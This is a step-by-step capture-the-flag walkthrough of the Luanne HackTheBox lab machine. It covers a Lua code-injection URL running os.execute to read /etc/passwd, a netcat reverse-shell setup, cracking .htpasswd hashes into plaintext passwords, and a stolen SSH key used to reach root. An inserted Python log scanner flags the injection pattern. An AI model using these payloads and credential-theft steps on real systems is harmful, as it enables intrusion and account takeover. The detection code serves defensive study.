Luanne HackTheBox WalkThrough

This is the Luanne HackTheBox machine walkthrough. In this writeup I demonstrate step by step how I rooted the Luanne HTB machine. Before starting, let us learn something about this machine. It is a NetBSD box (which I came to know only after I got into the box) with IP address 10.10.10.218 and difficulty rated easy by its maker. First of all, connect your PC to the HackTheBox VPN and make sure you can reach the Luanne machine by pinging its IP 10.10.10.218. If all goes well, start hacking.
As usual, I started by scanning the machine. I used Nmap [a port scanner] for this task, and this time I added the nmap switch -O to detect the operating system, since we do not know its OS beforehand. The result is below:
Scanning
$ sudo nmap -sC -sV -O -oN launne.nmap 10.10.10.218

Nmap found ports 22, 80 and 9001 open, but it could not identify the OS or even guess its name. Anyway, we will learn its name and version once we are inside the box. For now let us enumerate ports 22, 80 and 9001. OpenSSH 8.0 is running on port 22, and its banner also revealed the operating system name: NetBSD. So here we came to know that the OS of the Luanne machine is NetBSD. SSH will be useful once we obtain some credentials during further enumeration.
Let us dig deeper into the services on the remaining ports. Nginx 1.19 is running on port 80 and the Medusa 1.12 web server on port 9001. Since web servers are running on ports 80 and 9001, there should be websites at the URLs http://10.10.10.218 and http://10.10.10.218:9001. Visiting these URLs, I found a login prompt on both of them, similar to the one a Tomcat web server shows. If you analyze the nmap report closely you will find that the nmap script http-robots.txt revealed a folder weather on port 80, which can be accessed at the URL http://10.10.10.218/weather/.
When I visited this URL it gave me a 404 - Not Found error. Then I brute forced files and folders using $dirsearch (a directory and file bruteforcer written in Python) and the wordlist directory-list-1.0.txt (this wordlist can be found in the directory /usr/share/wordlists/dirbuster/ on Kali and Parrot).
Directory Bruteforcing
$ sudo dirsearch -u http://10.10.10.218/weather/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e all -t 40 | tee big.out

Directory bruteforcing revealed a file named forecast. Accessing it at the URL http://10.10.10.218/weather/forecast returned a JSON message revealing a parameter city that accepts the value list, i.e., city=list. When I accessed the URL with that parameter I got information about different cities.

After some enumeration and fuzzing I got an error revealing that this website uses the Lua programming language. Check this URL for the error: http://10.10.10.218/weather/forecast?city=London'

Since it uses Lua, I fuzzed the URL with some Lua strings and found that if we append ')os.execute("whoami") to the end of the URL http://10.10.10.218/weather/forecast?city=London, it executes an OS command on the Luanne machine. I think this is why the machine is named Luanne: we are able to execute code via a Lua statement, and Luanne also contains the word Lua. Let us confirm OS command execution by reading the /etc/passwd file of the Luanne machine.
Confirming OS Command Execution
Open the following URL in a browser to confirm code execution on the Luanne machine.
http://10.10.10.218/weather/forecast?city=London%27)os.execute(%22cat%20/etc/passwd%22)--

We have successfully confirmed remote code execution on the Luanne machine. Let us get a user shell on our local machine using a reverse shell one-liner. I used the $nc one-liner. You can find others at Pentestmonkey.
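From the defender's side, the injection above leaves a clear trace in the web server's access log. The following added example (my own code, not part of the original writeup) parses nginx combined-format lines, URL-decodes the city parameter, flags values carrying Lua break-out or os.execute fragments, and shows the allow-list check a hardened forecast endpoint should apply to city before using it. The log lines are constructed; the client IPs and user agents are made up.

```python
"""Added example (not from the writeup): flag Lua code-injection attempts against
/weather/forecast in nginx access logs, plus the allow-list a hardened endpoint
would apply to the city parameter. The sample log lines are constructed."""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# nginx "combined" format; only the fields this check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Fragments that never belong in a city name: a quote-paren that breaks out of a
# Lua string literal, shell-execution calls, or the trailing "--" comment marker.
LUA_MARKERS = re.compile(r"""['"]\s*\)|os\.execute|io\.popen|loadstring|\)\s*--""")
# Allow-list for the city value: letters, spaces, dots and hyphens only.
CITY_OK = re.compile(r"[A-Za-z][A-Za-z .-]{0,63}")

def is_valid_city(value: str) -> bool:
    """True only for values that look like a city name (or the 'list' keyword)."""
    return CITY_OK.fullmatch(value) is not None

def classify(line: str) -> Optional[dict]:
    """Parse one access-log line and report whether its city value is suspicious."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # parse_qs percent-decodes, so %27 becomes the quote the payload relies on.
    values = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True).get("city")
    city = values[0] if values else None
    return {
        "ip": m["ip"],
        "status": m["status"],
        "city": city,
        "invalid": city is not None and not is_valid_city(city),
        "lua_injection": city is not None and LUA_MARKERS.search(city) is not None,
    }

def scan(log_text: str) -> list:
    """Classify every parseable line; callers alert on invalid or lua_injection."""
    return [r for r in map(classify, log_text.splitlines()) if r is not None]

# Constructed sample: a normal lookup, the quote probe from the writeup, the
# os.execute payload, and the harmless city=list request.
SAMPLE_LOG = """\
10.10.14.5 - - [16/Sep/2020:10:01:02 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 312 "-" "curl/7.72.0"
10.10.14.5 - - [16/Sep/2020:10:01:09 +0000] "GET /weather/forecast?city=London%27 HTTP/1.1" 500 211 "-" "curl/7.72.0"
10.10.14.5 - - [16/Sep/2020:10:01:20 +0000] "GET /weather/forecast?city=London%27)os.execute(%22cat%20/etc/passwd%22)-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.7 - - [16/Sep/2020:10:02:00 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 540 "-" "curl/7.72.0"
"""
```

Run `scan(SAMPLE_LOG)` to see the single-quote probe flagged as invalid and the os.execute request flagged as lua_injection, while the plain London and list lookups pass both checks.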
Getting User Shell
To get a reverse shell, first start a netcat listener on your Kali machine and then execute the following URL in the browser. You will get a shell.
$ rlwrap nc -nvlp 1234
$ whoami && id

We have got a user shell as user _httpd. The home folder of this user, i.e. the current folder, contains a hidden file .htpasswd. Listing the contents of this file revealed a password hash for user webapi_user.
$ ls -la
$ cat .htpasswd

webapi_user : $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
Let us identify the type of this hash so that we can crack it using $hashcat (an offline password cracker).
$ hash-identifier
~$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

hash-identifier identified this hash as MD5 (Unix). Let us crack it using the wordlist rockyou.txt. The rockyou.txt file can be found inside the directory /usr/share/wordlists/ on Kali and Parrot OS.
Cracking Hash 1 using Hashcat
$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt

$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt --show

Hashcat successfully cracked the hash; the password is iamthebest, so we have the credential webapi_user:iamthebest. When I tried to SSH with this credential it failed. After some enumeration I found that ports 3000 and 3001 are listening locally.

When I tried to access the service on port 3001 via the URL http://127.0.0.1:3001 I got a 401 Unauthorized error. So I used the credential webapi_user:iamthebest to access the service and found that we could log in easily; this time there was no access denied error.
$ curl http://127.0.0.1:3001
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001

After some further enumeration I obtained the id_rsa key of user r.michaels from its home folder using the $curl command. This is somewhat unusual, because normally the id_rsa file lives inside the .ssh folder of the user's home directory and can be accessed only by that user and root. Here, however, it can be fetched from a web server running locally, so the file must be inside some kind of public_html folder. I did not know exactly which folder it was in until I pwned the box.
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001/~r.michaels/id_rsa

We have got the SSH private key. Let us SSH into the Luanne machine with this key after fixing its permissions.
Getting User Shell using SSH
$ vi id_rsa
$ chmod 400 id_rsa
$ ssh -i id_rsa r.michaels@10.10.10.218
$ whoami && id

We are now logged in as user r.michaels. Let us capture the user flag.
Capture User Flag
$ cat user.txt

Privilege Escalation
To escalate privileges to root we first have to find a privilege escalation vector. For this I ran linpeas.sh (a post-exploitation enumeration script), but linpeas did not find any valid PrivEsc vector. So I started manual enumeration on the box. After spending some time on the box I found an encrypted file devel_backup-2020-09-16.tar.gz.enc inside the directory /home/r.michaels/backups/. I did not know how to extract this file. If it were a .gz or .g2z file we would use the $tar tool to extract it, but this file has the .enc extension. After some googling I found the tool $netpgp, which can decrypt this file. Check this for more info.
Finding PrivEsc Vector
$ ls -la /home/r.michaels/backups/

To extract this file I simply went to the /tmp/ folder, decrypted the file there and extracted it using the following commands. When it asks for a password, enter the password iamthebest.
$ cd /tmp/
$ netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output=devel_backup-2020-09-16.tar.gz
$ tar -xf devel_backup-2020-09-16.tar.gz
$ cat devel-2020-09-16/www/.htpasswd

After extracting it I found another hash for user webapi_user: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu. (the trailing dot is part of the hash). It is again an MD5 (Unix) hash, as you can see in the hash-identifier result.
$ hash-identifier
~$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

After cracking this hash using hashcat I found the password littlebear. Then I tried to switch to the root user using NetBSD's $doas command, and I could log in as root easily. So here our PrivEsc vector is Privilege Escalation using Credential Dumping.
Cracking Hash 2 using Hashcat
$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt

$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt --show

Let us switch to the root user using the $doas command. $doas on NetBSD is the equivalent of $sudo on Linux: it executes a command as another user. For more info check this link from FreeBSD.org.
$ doas -u root /bin/sh
~littlebear
# whoami && id

Capture Root Flag
Let us capture the root flag.
# cat /root/root.txt

This was how I rooted the Luanne HackTheBox machine. I learnt a lot after rooting this box. I hope you have also learnt some new things from this walkthrough. Thanks for reading this writeup. For any query or suggestion feel free to write to us at [email protected].
